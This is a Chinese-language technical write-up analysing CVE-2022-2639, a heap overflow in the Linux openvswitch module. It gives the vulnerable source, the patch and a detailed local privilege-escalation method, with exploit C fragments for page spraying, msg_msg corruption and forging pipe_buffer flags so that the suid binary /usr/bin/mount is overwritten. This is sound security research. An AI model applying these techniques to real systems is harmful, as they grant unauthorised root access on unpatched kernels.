【kernel exploit】CVE-2022-2639 openvswitch模块kmalloc-0x10000堆溢出利用（pipe_buffer任意文件写技术）

影响版本：Linux v3.13-rc1~5.18-rc4 5.17.5已修补，5.17.4未修补。本文来自于 veritas501 提出的基于pipe实现任意文件写的利用方法。

测试版本：Linux-5.17.4 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory

编译选项：

CONFIG_OPENVSWITCH=y （漏洞模块）

// 依赖
CONFIG_INET=y
# CONFIG_NF_CONNTRACK is not set
CONFIG_LIBCRC32C=y
CONFIG_MPLS=y
CONFIG_NET_MPLS_GSO=y
CONFIG_DST_CACHE=y
CONFIG_NET_NSH=y
// net/openvswitch/Kconfig
config OPENVSWITCH
	tristate "Open vSwitch"
	depends on INET
	depends on !NF_CONNTRACK || \
		   (NF_CONNTRACK && ((!NF_DEFRAG_IPV6 || NF_DEFRAG_IPV6) && \
				     (!NF_NAT || NF_NAT) && \
				     (!NETFILTER_CONNCOUNT || NETFILTER_CONNCOUNT)))
	select LIBCRC32C
	select MPLS
	select NET_MPLS_GSO
	select DST_CACHE
	select NET_NSH
// 在对应 menu item 上按 h 即可显示依赖和配置方案
  ┌────────────────────────────────────────────────────── Open vSwitch ──────────────────────────────────────────────────────┐
  │ Open vSwitch is a multilayer Ethernet switch targeted at virtualized                                                     │  
  │ environments.  In addition to supporting a variety of features                                                           │  
  │ expected in a traditional hardware switch, it enables fine-grained                                                       │  
  │ programmatic extension and flow-based control of the network.  This                                                      │  
  │ control is useful in a wide variety of applications but is                                                               │  
  │ particularly important in multi-server virtualization deployments,                                                       │  
  │ which are often characterized by highly dynamic endpoints and the                                                        │  
  │ need to maintain logical abstractions for multiple tenants.                                                              │  
  │                                                                                                                          │  
  │ The Open vSwitch datapath provides an in-kernel fast path for packet                                                     │  
  │ forwarding.  It is complemented by a userspace daemon, ovs-vswitchd,                                                     │  
  │ which is able to accept configuration from a variety of sources and                                                      │  
  │ translate it into packet processing rules.                                                                               │  
  │                                                                                                                          │  
  │ See http://openvswitch.org for more information and userspace                                                            │  
  │ utilities.                                                                                                               │  
  │                                                                                                                          │  
  │ To compile this code as a module, choose M here: the module will be                                                      │  
  │ called openvswitch.                                                                                                      │  
  │                                                                                                                          │  
  │ If unsure, say N.                                                                                                        │  
  │                                                                                                                          │  
  │ Symbol: OPENVSWITCH [=m]                                                                                                 │  
  │ Type  : tristate                                                                                                         │  
  │ Defined at net/openvswitch/Kconfig:6                                                                                     │  
  │   Prompt: Open vSwitch                                                                                                   │  
  │   Depends on: NET [=y] && INET [=y] && (!NF_CONNTRACK [=m] || NF_CONNTRACK [=m] && (!NF_DEFRAG_IPV6 [=m] || \            │  
  │ NF_DEFRAG_IPV6 [=m]) && (!NF_NAT [=m] || NF_NAT [=m]) && (!NETFILTER_CONNCOUNT [=m] || NETFILTER_CONNCOUNT [=m]))        │  
  │   Location:                                                                                                              │  
  │     Main menu                                                                                                            │  
  │       -> Networking support (NET [=y])                                                                                   │  
  │         -> Networking options                                                                                            │  
  │ Selects: LIBCRC32C [=y] && MPLS [=y] && NET_MPLS_GSO [=y] && DST_CACHE [=y] && NET_NSH [=y]                              │  
  │                                                                                             

CONFIG_BINFMT_MISC=y （否则启动VM时报错）

CONFIG_USER_NS=y

在编译时将.config中的CONFIG_E1000和CONFIG_E1000E，变更为=y。参考

$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.17.4.tar.xz
$ tar -xvf linux-5.17.4.tar.xz
# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
$ make -j32
$ make all
$ make modules
# 编译出的bzImage目录：/arch/x86/boot/bzImage。

漏洞描述：openvswitch 内核模块中，reserve_sfa_size() 存在整数溢出导致 kmalloc-0x10000 堆溢出写，需要利用页喷射构造 cross-cache 溢出。

补丁：patch 漏洞引入commit

@@ -2465,7 +2465,7 @@ static struct nlattr *reserve_sfa_size(struct sw_flow_actions **sfa,
	new_acts_size = max(next_offset + req_size, ksize(*sfa) * 2);

	if (new_acts_size > MAX_ACTIONS_BUFSIZE) {
-		if ((MAX_ACTIONS_BUFSIZE - next_offset) < req_size) {
+       if ((next_offset + req_size) > MAX_ACTIONS_BUFSIZE) {
			OVS_NLERR(log, "Flow action size exceeds max %u",
				  MAX_ACTIONS_BUFSIZE);
			return ERR_PTR(-EMSGSIZE);

保护机制：KASLR/SMEP/SMAP/KPTI

利用总结：本文基于 pipe-primitive 来篡改任意文件，所以不需要绕过 KASLR/SMEP/SMAP/KPTI 保护机制，跨版本不需要适配就能完成利用。先创建pipe并splice到只读文件/usr/bin/mount，堆喷伪造 pipe_buffer->flags = PIPE_BUF_FLAG_CAN_MERGE ，这样就能往 /usr/bin/mount 文件写入 suid-shell 然后执行提权。

两次触发OOB，第一次是溢出篡改 msg_msg->m_ts 越界读取相邻的 msg_msg->m_list.next 泄露kmalloc-1024堆地址；第2次是溢出篡改 msg_msg->m_list.next 指向泄露的kmalloc-1024堆地址，构造任意释放。

注意，执行exploit前手动备份 /usr/bin/mount 并在执行exploit后恢复；要根据实际环境，选取要篡改的目标文件，例如我测试的环境需篡改 /bin/mount。

（1）初始化：绑定CPU(0)；设置namespace；初始化 2*0x400 个 msg 队列，用2个数组 msqid_1 / msqid_2 来存储；初始化4个 sock_pairs 用于堆喷 sk_buff->data；
（2）泄露堆地址 kmalloc-1024
- （2-1）堆风水：堆喷 RX_RING buffer 耗尽 0x1000~0x10000 之间所有的堆块；
- （2-2）堆布局：喷射 32 个大小为 0x10000 的堆块，释放奇数下标的堆块；
- （2-3）喷射 msg_msg：数组 msqid_1——喷射0x400个 msg_msg + msg_msgseg 组合，位于 0x1000 + 0x400，占据奇数下标的 0x10000 堆块，并使某个 0x1000 大小的 msg_msg 位于 0x10000 堆块开头；
- （2-4）释放偶数下标的 0x10000 堆块；
- （2-5）布置漏洞对象：触发漏洞，分配漏洞对象占据偶数下标的 0x10000 堆块，溢出篡改相邻的 msg_msg->m_ts = 0x1400 + 0x400；
- （2-6）找到被溢出篡改的 msg_msg（判断可读取长度是否为 0x1800），记为 list1_corrupted_msqid；
- （2-7）释放数组 msqid_1 中除 list1_corrupted_msqid 以外所有的 msg_msg + msg_msgseg；
- （2-8）数组 msqid_2 —— 喷射0x400 * 16 个 msg_msg，位于 kmalloc-0x400（目的是使每个 kmalloc-1024 msg_msg 的 msg_msg->m_list 都指向 kmalloc-1024 对象）；
- （2-9）通过 list1_corrupted_msqid 越界读取泄露相邻的 msg_msg->m_list.next / prev，也即 kmalloc-1024 地址（记为 list2_uaf_msg_addr），被泄露的 msg_msg 记为 list2_leak_msqid；
- （2-10）释放数组 msqid_2 中除 list2_leak_msqid 以外所有的 msg_msg；
（3）伪造 pipe_buffer->flags 并用shellcode覆写 /usr/bin/mount 文件（我的测试环境中是覆写 /bin/mount 文件）
- （3-1）堆风水：堆喷 RX_RING buffer 耗尽 0x1000~0x10000 之间所有的堆块；
- （3-2）堆布局：喷射 32 个大小为 0x10000 的堆块，释放奇数下标的堆块；
- （3-3）喷射 msg_msg：数组 msqid_1——喷射0x400个 msg_msg + msg_msgseg 组合，位于 0x1000 + 0x400，占据奇数下标的 0x10000 堆块，并使某个 0x1000 大小的 msg_msg 位于 0x10000 堆块开头；
- （3-4）释放偶数下标的 0x10000 堆块；
- （3-5）布置漏洞对象：触发漏洞，分配漏洞对象占据偶数下标的 0x10000 堆块，溢出篡改相邻的 msg_msg->m_list.next （被篡改的）指向 list2_leak_msqid 泄露的 kmalloc-1024 堆块地址（也即 list2_uaf_msg_addr）；
- （3-6）第1次释放uaf msg_msg：通过 list2_leak_msqid 第1次释放泄露的 uaf msg_msg(kmalloc-1024) ；
- （3-7）堆喷 4*32 个 sk_buff->data 来占据 uaf msg_msg kmalloc-1024，伪造 msg_msg->m_list.next = msg_msg->m_list.prev = list2_uaf_msg_addr / msg_msg->m_type = MTYPE_FAKE；
- （3-8）第2次释放uaf msg_msg：通过 msqid_1 第2次释放 msg_msg->m_type = MTYPE_FAKE 的 uaf msg_msg - list2_uaf_msg_addr(kmalloc-1024)；
- （3-9）喷射 0x100个 pipe_buffer 占据 uaf msg_msg 并都 splice 到 /bin/mount；
- （3-10）读取（释放）所有的sk_buff->data ，根据读取的内容（pipe_buffer->len）判断重叠的 pipe_buffer 下标（记为 uaf_pipe_idx）；
- （3-11）喷射 4*32 个 sk_buff->data 来伪造 pipe_buffer->flags = PIPE_BUF_FLAG_CAN_MERGE，其余成员的值不变；
- （3-12）通过下标为uaf_pipe_idx 的pipe篡改 /bin/mount；
（4）执行 /bin/mount 文件提权。

1. 漏洞分析

漏洞调用路径：__ovs_nla_copy_actions() -> copy_action() -> reserve_sfa_size()

1-1. 代码分析

__ovs_nla_copy_actions()：根据传入的 actions 信息的种类分类进行处理（有的直接拷贝，有的则先处理后存入 sw_flow_actions **sfa 再拷贝），然后调用 copy_action() 拷贝 action 和 struct nlattr 数据。

static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
				  const struct sw_flow_key *key,
				  struct sw_flow_actions **sfa,
				  __be16 eth_type, __be16 vlan_tci,
				  u32 mpls_label_count, bool log)
{
	u8 mac_proto = ovs_key_mac_proto(key);
	const struct nlattr *a;
	int rem, err;

	nla_for_each_nested(a, attr, rem) {
		/* Expected argument lengths, (u32)-1 for variable length. */
		static const u32 action_lens[OVS_ACTION_ATTR_MAX + 1] = {
			[OVS_ACTION_ATTR_OUTPUT] = sizeof(u32),
			[OVS_ACTION_ATTR_RECIRC] = sizeof(u32),
			[OVS_ACTION_ATTR_USERSPACE] = (u32)-1,
			[OVS_ACTION_ATTR_PUSH_MPLS] = sizeof(struct ovs_action_push_mpls),
			[OVS_ACTION_ATTR_POP_MPLS] = sizeof(__be16),
			[OVS_ACTION_ATTR_PUSH_VLAN] = sizeof(struct ovs_action_push_vlan),
			[OVS_ACTION_ATTR_POP_VLAN] = 0,
			[OVS_ACTION_ATTR_SET] = (u32)-1,
			[OVS_ACTION_ATTR_SET_MASKED] = (u32)-1,
			[OVS_ACTION_ATTR_SAMPLE] = (u32)-1,
			[OVS_ACTION_ATTR_HASH] = sizeof(struct ovs_action_hash),
			[OVS_ACTION_ATTR_CT] = (u32)-1,
			[OVS_ACTION_ATTR_CT_CLEAR] = 0,
			[OVS_ACTION_ATTR_TRUNC] = sizeof(struct ovs_action_trunc),
			[OVS_ACTION_ATTR_PUSH_ETH] = sizeof(struct ovs_action_push_eth),
			[OVS_ACTION_ATTR_POP_ETH] = 0,
			[OVS_ACTION_ATTR_PUSH_NSH] = (u32)-1,
			[OVS_ACTION_ATTR_POP_NSH] = 0,
			[OVS_ACTION_ATTR_METER] = sizeof(u32),
			[OVS_ACTION_ATTR_CLONE] = (u32)-1,
			[OVS_ACTION_ATTR_CHECK_PKT_LEN] = (u32)-1,
			[OVS_ACTION_ATTR_ADD_MPLS] = sizeof(struct ovs_action_add_mpls),
			[OVS_ACTION_ATTR_DEC_TTL] = (u32)-1,
		};
		const struct ovs_action_push_vlan *vlan;
		int type = nla_type(a);
		bool skip_copy;

		if (type > OVS_ACTION_ATTR_MAX ||
		    (action_lens[type] != nla_len(a) &&
		     action_lens[type] != (u32)-1))
			return -EINVAL;

		skip_copy = false;
		switch (type) {
		case OVS_ACTION_ATTR_UNSPEC:
			return -EINVAL;
        ...
        case OVS_ACTION_ATTR_DEC_TTL:
			err = validate_and_copy_dec_ttl(net, a, key, sfa,
							eth_type, vlan_tci,
							mpls_label_count, log);
			if (err)
				return err;
			skip_copy = true;
			break;

		default:
			OVS_NLERR(log, "Unknown Action type %d", type);
			return -EINVAL;
		}
		if (!skip_copy) {
			err = copy_action(a, sfa, log);			// [1] 对不同的 actions 信息分类进行拷贝
			if (err)
				return err;
		}
	}
	...
}

copy_action()

static int copy_action(const struct nlattr *from,
		       struct sw_flow_actions **sfa, bool log)
{
	int totlen = NLA_ALIGN(from->nla_len);
	struct nlattr *to;

	to = reserve_sfa_size(sfa, from->nla_len, log);	// [2] 漏洞函数
	if (IS_ERR(to))
		return PTR_ERR(to);

	memcpy(to, from, totlen);						// [3] 溢出点!!!!! 这里是拷贝 action 后面的数据
	return 0;
}

reserve_sfa_size()：整数溢出发生在 [2-1] 处，next_offset 为有符号，req_size 为无符号。左边 next_offset 可能大于 MAX_ACTIONS_BUFSIZE，相减可能为负数，导致整数溢出，绕过本检查。

分配堆块：后面会分配buffer并拷贝 actions 和 nlattr 数据。堆块内容分为三个部分，struct sw_flow_actions header + actions + 其他nlattr

static struct nlattr *reserve_sfa_size(struct sw_flow_actions **sfa,
				       int attr_len, bool log)
{

	struct sw_flow_actions *acts;
	int new_acts_size;
	size_t req_size = NLA_ALIGN(attr_len);							// req_size = (nlattr->nla_len)
	int next_offset = offsetof(struct sw_flow_actions, actions) +	// next_offset = (sizeof(*sfa) + (*sfa)->actions_len)
					(*sfa)->actions_len;							// offsetof() - 一个结构成员相对于结构开头的字节偏移量

	if (req_size <= (ksize(*sfa) - next_offset))
		goto out;

	new_acts_size = max(next_offset + req_size, ksize(*sfa) * 2);

	if (new_acts_size > MAX_ACTIONS_BUFSIZE) {
		if ((MAX_ACTIONS_BUFSIZE - next_offset) < req_size) {	// [2-1] next_offset 为有符号, req_size 为无符号。 左边可能有 MAX_ACTIONS_BUFSIZE < next_offset, 相减可能为负数, 导致整数溢出, 绕过本检查。        MAX_ACTIONS_BUFSIZE = 0x8000
			OVS_NLERR(log, "Flow action size exceeds max %u",
				  MAX_ACTIONS_BUFSIZE);
			return ERR_PTR(-EMSGSIZE);
		}
		new_acts_size = MAX_ACTIONS_BUFSIZE;					// [2-2] new_acts_size = 0x8000
	}

	acts = nla_alloc_flow_actions(new_acts_size);				// [2-3] 分配新的buffer (分配得到 0x10000 大小的堆块)
	if (IS_ERR(acts))
		return (void *)acts;

	memcpy(acts->actions, (*sfa)->actions, (*sfa)->actions_len);// [2-4] 先拷贝 action 数据
	acts->actions_len = (*sfa)->actions_len;
	acts->orig_len = (*sfa)->orig_len;
	kfree(*sfa);
	*sfa = acts;

out:
	(*sfa)->actions_len += req_size;
	return  (struct nlattr *) ((unsigned char *)(*sfa) + next_offset);	// [2-5] 返回 buffer+next_offset 地址
}

static struct sw_flow_actions *nla_alloc_flow_actions(int size)
{
	struct sw_flow_actions *sfa;

	WARN_ON_ONCE(size > MAX_ACTIONS_BUFSIZE);

	sfa = kmalloc(sizeof(*sfa) + size, GFP_KERNEL);				// [2-3-1] 分配大小为 0x8000+0x20 (头部是sw_flow_actions对象), 对齐后实际会分配得到 0x10000 堆块
	if (!sfa)
		return ERR_PTR(-ENOMEM);

	sfa->actions_len = 0;
	return sfa;
}

1-2. 溢出可行性

数据包格式：struct nlmsghdr -> struct genlmsghdr -> struct nlattr 由于 openswitch 采用 netlink 进行通信，所以通信的数据结构分为这三层。

/*
 *  <------- NLA_HDRLEN ------> <-- NLA_ALIGN(payload)-->
 * +---------------------+- - -+- - - - - - - - - -+- - -+
 * |        Header       | Pad |     Payload       | Pad |
 * |   (struct nlattr)   | ing |                   | ing |
 * +---------------------+- - -+- - - - - - - - - -+- - -+
 *  <-------------- nlattr->nla_len -------------->
 */

struct nlattr {		// 这个结构的 padding 值为 4 bytes
	__u16           nla_len;
	__u16           nla_type;
};
#define NLA_ALIGNTO		4
#define NLA_ALIGN(len)		(((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1))

溢出长度问题：前面的溢出点（[3]处）的拷贝长度是 nlattr->nla_len，但这个长度只有2字节，最大为 0xffff，而堆块大小为 0x10000，看起来没办法溢出。[2-4] 处会先拷贝 sw_flow_actions ，这个结构也只是 struct nlattr 的子结构（也是从一个 struct nlattr 结构转化为一个 sw_flow_actions 结构），看似无法溢出？？？

1-3. 填充action数据-增大溢出长度

思路分析：重新看看最上层的__ovs_nla_copy_actions() 函数，通常我们传入的 struct nlattr 结构和要拷贝的 action 长度是一致的，最后都调用 copy_action() 来拷贝数据（默认 skip_copy = false，在 [1] 处调用），但是有些类型的 action 并没有调用 copy_action() 函数。而是先自行处理传入的表示action 的 nlattr，将 action 保存在 sw_flow_actions *sfa 结构中，最后通过别的 nlattr 类型触发调用 copy_action() 将 sw_flow_actions *sfa 拷贝到漏洞对象中，也就是 [2-4] 处的第一次拷贝。但是有些类型的 nlattr 结构转化为 action 结构之后，结构长度变大了，这样有可能导致第二次拷贝时产生溢出，总拷贝长度超过 0x10000。

案例1：例如 OVS_ACTION_ATTR_CT，调用 ovs_ct_copy_action() 来自行拷贝 action。[a] 处调用 parse_ct() 将8字节的 nlattr 结构转化为 0xA0 字节的 ovs_conntrack_info 结构，然后在 [b] 处调用 ovs_nla_add_action() 来将 action 保存到 sw_flow_actions **sfa 中。这样就能把 8 字节数据放大为 0xA0 字节，如果传入500个类型为 OVS_ACTION_ATTR_CT 的 nlattr，就能把前面分析的 next_offset 变量的值从 500*8 = 0xFA0 增加到 0x500*0xa0 = 0x13880 ，导致[3] 处拷贝溢出。

		case OVS_ACTION_ATTR_CT:
			err = ovs_ct_copy_action(net, a, key, sfa, log);
			if (err)
				return err;
			skip_copy = true;
			break;

int ovs_ct_copy_action(struct net *net, const struct nlattr *attr,
		       const struct sw_flow_key *key,
		       struct sw_flow_actions **sfa,  bool log)
{
	struct ovs_conntrack_info ct_info;
	const char *helper = NULL;
	u16 family;
	int err;

	family = key_to_nfproto(key);
	if (family == NFPROTO_UNSPEC) {
		OVS_NLERR(log, "ct family unspecified");
		return -EINVAL;
	}

	memset(&ct_info, 0, sizeof(ct_info));
	ct_info.family = family;

	nf_ct_zone_init(&ct_info.zone, NF_CT_DEFAULT_ZONE_ID,
			NF_CT_DEFAULT_ZONE_DIR, 0);

	err = parse_ct(attr, &ct_info, &helper, log);					// [a] 根据 nlattr 结构解析出 ovs_conntrack_info 结构
	...
	err = ovs_nla_add_action(sfa, OVS_ACTION_ATTR_CT, &ct_info,		// [b] 
				 sizeof(ct_info), log);
	...
}

问题：问题是 ovs_conntrack_info 结构在不同版本中不一样，所以结构大小不固定，所以转向 OVS_ACTION_ATTR_SET 这类 action。

案例2：处理 OVS_ACTION_ATTR_SET 这类 action时，在 validate_set() 中处理 action 类型的 nlattr。

		case OVS_ACTION_ATTR_SET:
			err = validate_set(a, key, sfa,
					   &skip_copy, mac_proto, eth_type,
					   false, log);
			if (err)
				return err;
			break;

static int validate_set(const struct nlattr *a,
			const struct sw_flow_key *flow_key,
			struct sw_flow_actions **sfa, bool *skip_copy,
			u8 mac_proto, __be16 eth_type, bool masked, bool log)
{
	const struct nlattr *ovs_key = nla_data(a);					// [a] 取出内层嵌套的子 nlattr
	int key_type = nla_type(ovs_key);
	size_t key_len;

	/* There can be only one key in a action */
	if (nla_total_size(nla_len(ovs_key)) != nla_len(a))
		return -EINVAL;

	key_len = nla_len(ovs_key);									// [b] key_len = data length
	if (masked)														// OVS_ACTION_ATTR_SET 不会设置 masked
		key_len /= 2;

	if (key_type > OVS_KEY_ATTR_MAX ||
	    !check_attr_len(key_len, ovs_key_lens[key_type].len))	// [c] 检查 key_len 是否符合 type (OVS_KEY_ATTR_ETHERNET) 对应的结构大小
		return -EINVAL;

	if (masked && !validate_masked(nla_data(ovs_key), key_len))
		return -EINVAL;

	switch (key_type) {
	...
	case OVS_KEY_ATTR_ETHERNET:
		if (mac_proto != MAC_PROTO_ETHERNET)					// [d] 对 key_type == OVS_KEY_ATTR_ETHERNET 的检查很简单
			return -EINVAL;
		break;
    ...
	}

	/* Convert non-masked non-tunnel set actions to masked set actions. */
	if (!masked && key_type != OVS_KEY_ATTR_TUNNEL) {
		int start, len = key_len * 2;							// [e] !!!!!!!!!!! len 为 key_len 的两倍
		struct nlattr *at;

		*skip_copy = true;										// [f] 设置 skip_copy, 避免上层函数调用 copy_action()

		start = add_nested_action_start(sfa,
						OVS_ACTION_ATTR_SET_TO_MASKED,
						log);
		if (start < 0)
			return start;

		at = __add_action(sfa, key_type, NULL, len, log);		// [g] 调用 __add_action(), 传入的 len=2*key_len, 先保存在 sfa 中, 最后通过别的 nlattr 类型触发调用 `copy_action()` 将 `sw_flow_actions **sfa` 拷贝到漏洞对象中
		if (IS_ERR(at))
			return PTR_ERR(at);

		memcpy(nla_data(at), nla_data(ovs_key), key_len); /* Key. */
		memset(nla_data(at) + key_len, 0xff, key_len);    /* Mask. */
		/* Clear non-writeable bits from otherwise writeable fields. */
		if (key_type == OVS_KEY_ATTR_IPV6) {
			struct ovs_key_ipv6 *mask = nla_data(at) + key_len;

			mask->ipv6_label &= htonl(0x000FFFFF);
		}
		add_nested_action_end(*sfa, start);
	}

	return 0;
}

假设内部嵌套的 nlattr type 为 OVS_KEY_ATTR_ETHERNET （对应结构为 ovs_key_ethernet），需通过 [c] 处对 key_len 的校验，也即 key_len = sizeof(struct ovs_key_ethernet) == 0x0C 。

[e] 处 len = 2*key_len == 0x18，最后添加的action长度为原长的两倍。算上添加这个 nlattr 所需的两层 header（嵌套），即需要使用0x04 + 0x04 + 0x0C == 0x14字节的内存就让最前面提出的buffer的指针前进0x04 + 0x04 + 0x0C * 2 == 0x20字节。虽然放大比例不如sizeof(struct ovs_conntrack_info)，但好在其在能用来溢出的前提下，保证了更优的稳定性（无需根据内核版本来计算结构体的大小）。

最终还是在 copy_action() 中的 [3] 处产生溢出，也即第2次拷贝剩余的 nlattr 时。

[OVS_KEY_ATTR_ETHERNET]	 = { .len = sizeof(struct ovs_key_ethernet) },

#define ETH_ALEN	6		/* Octets in one ethernet addr	 */
struct ovs_key_ethernet {
	__u8	 eth_src[ETH_ALEN];
	__u8	 eth_dst[ETH_ALEN];
};

2. 漏洞利用

利用思路：需要构造 cross cache 溢出篡改 msg_msg，从 kmalloc-0x10000 上的漏洞对象溢出篡改位于 kmalloc-0x1000 上的 msg_msg。

2-1. 页喷射

页喷射：页喷射知识请参考 CVE-2022-27666。采用 rx_ring buffer 对象进行堆喷，调用路径为 packet_setsockopt() -> packet_set_ring() -> alloc_pg_vec() -> alloc_one_pg_vec_page()。分配页的 order 由 tpacket_req->tp_block_size 决定。喷射代码示例如下所示：

#include <linux/if_packet.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/ethernet.h>

void packet_socket_rx_ring_init(int s, unsigned int block_size,
                                unsigned int frame_size, unsigned int block_nr,
                                unsigned int sizeof_priv, unsigned int timeout) {
    int v = TPACKET_V3;
    int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
    if (rv < 0) {
        die("setsockopt(PACKET_VERSION): %m");
    }

    struct tpacket_req3 req;
    memset(&req, 0, sizeof(req));
    req.tp_block_size = block_size;
    req.tp_frame_size = frame_size;
    req.tp_block_nr = block_nr;
    req.tp_frame_nr = (block_size * block_nr) / frame_size;
    req.tp_retire_blk_tov = timeout;
    req.tp_sizeof_priv = sizeof_priv;
    req.tp_feature_req_word = 0;

    rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
    if (rv < 0) {
        die("setsockopt(PACKET_RX_RING): %m");
    }
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
                        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0) {
        die("socket(AF_PACKET): %m");
    }

    packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
                               sizeof_priv, timeout);

    struct sockaddr_ll sa;
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = if_nametoindex("lo");
    sa.sll_hatype = 0;
    sa.sll_pkttype = 0;
    sa.sll_halen = 0;

    int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
    if (rv < 0) {
        die("bind(AF_PACKET): %m");
    }

    return s;
}

int pagealloc_pad(int count, int size) {
    return packet_socket_setup(size, 2048, count, 0, 100);
}

int fd;

fd = pagealloc_pad(1, 0x10000) // 分配一个0x10000的chunk
close(fd) // 释放 chunk
    
fd = pagealloc_pad(100, 0x1000) // 分配 100 个 0x1000 的chunk
close(fd) // 一次性释放这个100个chunk

2-2. 堆布局

堆风水：首先进行堆风水，耗尽 0x1000 ~ 0x10000 之间 freelist 中的堆块，以构造漏洞对象和 msg_msg 相邻的堆布局。

logd("do heap fengshui to reduce noise ...");
pagealloc_pad(1000, 0x1000);
pagealloc_pad(500, 0x2000);
pagealloc_pad(200, 0x4000);
pagealloc_pad(200, 0x8000);
pagealloc_pad(100, 0x10000);

构造漏洞对象与 msg_msg 相邻：喷射32个 0x10000 大小的堆块，这样就会从 0x20000（order 5）的页申请内存并分割成两个 0x10000（order 4）堆块，并且大概率相邻；释放奇数下标的 0x10000 堆块。

#define fengshui_skfd_cnt (0x20)

int fengshui_skfd[fengshui_skfd_cnt];
for (int i = 0; i < fengshui_skfd_cnt; i++) {
	fengshui_skfd[i] = pagealloc_pad(1, 0x10000);
}
for (int i = 1; i < fengshui_skfd_cnt; i += 2) {
	close(fengshui_skfd[i]);
	fengshui_skfd[i] = -1;
}

堆喷 1个 0x1000 的 msg_msg 和1个 0x400的 msg_msgseg，大概率与某个漏洞对象相邻。

释放另一半的 rx_ring buffer，触发漏洞分配漏洞对象并溢出篡改相邻 msg_msg 的 msg_msg->m_ts 成员。

1-vul_state

2-3. 泄露堆地址

步骤：

（1）通过越界读取 msg_msg 就能泄露另一msg队列中的 msg_msgseg（我们标记被覆写的 msg_msg 为 corrupted msg，标记被越界读取的 msg_msgseg 为 leaked msg，通过预先填充的数据即可标识）；
（2）释放leaked msg，另起一堆 msg 队列，每个队列中喷16个0x400 的 msg_msg 去占据 leaked msg；
（3）通过 corrupted msg 越界读来泄露某个 msg_msg 的 msg_msg->m_list.next 指针，也即某个 kmalloc-0x400 堆块的地址。记为 leaked kmalloc-1024，后面用它来构造UAF。

2-leak_heap

2-4. 任意释放

任意释放：再次构造堆布局，触发漏洞篡改相邻 msg_msg 的 msg_msg->m_list.next，指向 leaked kmalloc-1024；这样就能释放掉 leaked kmalloc-1024，构造UAF。

3-arb-free

堆布局：

（1）先通过正常的 0x400 msg 队列释放掉 leaked kmalloc-1024；
（2）堆喷 sk_buff->data 占据 leaked kmalloc-1024，并伪造合法的 msg_msg 结构（注意，sk_buff->data是用于socket中的UDP的，大小为0x180~0x1000，前面是用户可控数据，后面0x140是struct skb_shared_info，且分配的flag为GFP_KERNEL_ACCOUNT）；
（3）再通过corrupted msg 队列再次释放掉 leaked kmalloc-1024，得到一个 sk_buff->data 的UAF；
（4）再喷射 pipe_buffer 占据 leaked kmalloc-1024，这样 sk_buff->data 和 pipe_buffer 就重叠了。同时操作pipe，打开目标suid文件，并做好splice操作。

4-pipe_buffer-sk_buff

#define ATTACK_FILE "/usr/bin/mount"

// filled with pipe_buffer
logd("spray pipe_buffer to re-acquire the 0x400 slab freed by skbuff_data");
int attack_fd = open(ATTACK_FILE, O_RDONLY);
if (attack_fd < 0) {
    die("open %s: %m", ATTACK_FILE);
}
for (int i = 0; i < NUM_PIPES; i++) {
    if (pipe(pipes[i])) {
        die("alloc pipe failed");
    }

    write(pipes[i][1], buff, 0x100 + i);

    loff_t offset = 1;
    ssize_t nbytes = splice(attack_fd, &offset, pipes[i][1], NULL, 1, 0);
    if (nbytes < 0) {
        die("splice() failed");
    }
}

2-5. 类似DirtyPipe利用

方法：通过读取 sk_buff->data 就能泄露整个 pipe_buffer 结构，并转化为 pipe_buffer 的UAF。接下来既可以泄露 pipe_buffer->ops 内核基址来构造ROP链（控制流劫持），也可以转化为类似 DirtyPipe利用场景（任意文件修改）。

原理：具体原理可参考 https://github.com/veritas501/pipe-primitive。在 kernel >= 5.8 中需要修改 pipe buffer 中 splice 页的flag |= PIPE_BUF_FLAG_CAN_MERGE即可（有能力可以顺便把offset和len改成0，这样就能从文件的开头开始写）；在 kernel < 5.8 中，需要先leak一下pipe_buffer中的anon_pipe_ops，然后将 splice 页的的ops改为anon_pipe_ops（因为<5.8版本中能否merge是看ops的）（有能力依然可以顺便把offset和len改成0）。

优点：从而下次对pipe写入就会修改文件的page cache，得到和DirtyPipe一样任意文件写的能力！对本地提权来说只要修改suid程序的内容或是修改/etc/passwd即可。不需要做ROP适配就能具备多版本通用性。

// 堆喷伪造 pipe_buffer 的代码
logd("edit pipe_buffer->flags");
{
    memset(buff, 0, sizeof(buff));
    memcpy(buff, pipe_buffer_backup, sizeof(pipe_buffer_backup));
    struct typ_pipe_buffer *ptr = (struct typ_pipe_buffer *)buff;
    ptr[1].flags = PIPE_BUF_FLAG_CAN_MERGE; // for kernel >= 5.8
    ptr[1].len = 0;
    ptr[1].offset = 0;
    ptr[1].ops = ptr[0].ops; // for kernel < 5.8
    spray_skbuff_data(buff, 0x400 - 0x140);
    hexdump(buff, sizeof(struct typ_pipe_buffer) * 2);
}

5-fake-pipe_buffer

2-6. 测试

测试提权如下：

succeed

3. 补充

3-1. DirtyPipe原理

<=4.8：最开始是否可以merge并不是通过 pipe_buffer->flags 字段来管理，而是通过 pipe_buf_operations->can_merge 字段来判断。在引入 splice 后同时引入了一个新的 pipe_buf_operations 也即 struct pipe_buf_operations page_cache_pipe_buf_ops ，其中 can_merge 字段默认为0，所以不需要设置flags，只需要设置 fops 指针指向 page_cache_pipe_buf_ops 即可。

const struct pipe_buf_operations page_cache_pipe_buf_ops = {
	.can_merge = 0,
	.confirm = page_cache_pipe_buf_confirm,
	.release = page_cache_pipe_buf_release,
	.steal = page_cache_pipe_buf_steal,
	.get = generic_pipe_buf_get,
};

